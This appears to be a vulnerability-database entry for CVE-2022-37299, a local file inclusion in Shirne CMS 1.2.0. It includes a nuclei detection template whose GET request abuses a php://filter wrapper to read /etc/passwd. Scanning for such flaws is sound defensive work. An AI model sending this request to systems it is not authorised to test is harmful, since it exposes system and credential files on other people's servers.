Lucene search
K

Shirne CMS 1.2.0 - Local File Inclusion

🗓️ 30 Jun 2026 04:56:11Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 25 Views

Shirne CMS 1.2.0 - Local File Inclusion vulnerability, allows unauthorized access to sensitive files and potential remote code execution. Mitigate by upgrading to the latest version or applying vendor-provided patch

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-37299
9 Sep 202215:15
attackerkb
Circl
CVE-2022-37299
9 Sep 202218:29
circl
CNNVD
ShirneCMS 路径遍历漏洞
9 Sep 202200:00
cnnvd
CVE
CVE-2022-37299
9 Sep 202214:10
cve
Cvelist
CVE-2022-37299
9 Sep 202214:10
cvelist
NVD
CVE-2022-37299
9 Sep 202215:15
nvd
Prion
Path traversal
9 Sep 202215:15
prion
Positive Technologies
PT-2022-23911 · Unknown · Shirne Cms
9 Sep 202200:00
ptsecurity
RedhatCVE
CVE-2022-37299
22 May 202523:09
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2022-37299
7 Jun 202500:00
vulncheck_kev
Rows per page
id: CVE-2022-37299

info:
  name: Shirne CMS 1.2.0 - Local File Inclusion
  author: pikpikcu
  severity: medium
  description: Shirne CMS 1.2.0 is vulnerable to local file inclusion which could cause arbitrary file read via /static/ueditor/php/controller.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.
  remediation: |
    Upgrade to the latest version of Shirne CMS or apply the vendor-provided patch to mitigate the LFI vulnerability.
  reference:
    - https://twitter.com/pikpikcu/status/1568316864690028544
    - https://gitee.com/shirnecn/ShirneCMS/issues/I5JRHJ?from=project-issue
    - https://nvd.nist.gov/vuln/detail/CVE-2022-37299
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Henry4E36/POCS
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2022-37299
    cwe-id: CWE-22
    epss-score: 0.02829
    epss-percentile: 0.84838
    cpe: cpe:2.3:a:shirne_cms_project:shirne_cms:1.2.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: shirne_cms_project
    product: shirne_cms
  tags: cve,cve2022,shirnecms,lfi,shirne_cms_project,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=/etc/passwd&maxwidth=-1&referer=test"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "cm9vd" # root in base64

      - type: word
        part: header
        words:
          - "image/png"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220029e9045a790ca11821a8f087233955ceb021a7a30e6694f9c09f56588d41b71022100984db6cc8e191a724e7c78270310a67790b537e5d8300d58a7db40c83f29f8e3:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation